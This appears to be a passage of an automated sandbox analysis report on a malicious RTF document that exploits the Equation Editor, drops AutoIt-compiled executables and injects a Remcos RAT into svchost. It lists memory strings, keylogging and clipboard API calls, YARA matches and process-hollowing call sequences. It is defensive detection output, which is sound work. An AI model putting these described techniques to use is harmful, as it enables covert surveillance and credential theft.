Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 0000000B.00000002.371347522.000000000019C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/Y
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 00000009.00000002.378984808.0000000000124000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: svchost.exe, 00000009.00000003.378925732.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com
Source: svchost.exe, 00000009.00000003.378615082.000000000055E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378336517.0000000000560000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.379157015.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378511247.00000000026AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: bhv41C2.tmp.9.dr String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 7_2_0040A2F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00D6407C
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00D6427A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0140427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_0140427A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_004168FC
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00D6407C
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 5_2_00D5003A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D7CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 5_2_00D7CB26
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0141CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_0141CB26
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041CA73 SystemParametersInfoW, 7_2_0041CA73

System Summary

Source: WC5Gv13cOQ.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: This is a third-party compiled AutoIt script. 5_2_00CF3B4C
Source: taskhostw.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_921122ed-a
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_86611a87-e
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0c71adcf-b
Source: taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_18eed303-6
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: This is a third-party compiled AutoIt script. 6_2_01393B4C
Source: name.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0bf80cf6-4
Source: name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_d50f2897-9
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b5798a10-8
Source: name.exe, 0000000D.00000002.394701390.0000000001444000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_a1fcae99-d
Source: name.exe.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_27650534-e
Source: name.exe.5.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_b99c995b-6
Source: taskhostw.exe.2.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b664b9a8-0
Source: taskhostw.exe.2.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_218956b6-4
Source: taskhostw[1].exe.2.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_efee54d2-7
Source: taskhostw[1].exe.2.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_92d865f2-e
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 7_2_0041812A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 7_2_0041330D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle, 7_2_0041BBC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle, 7_2_0041BB9A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 5_2_00D5A279
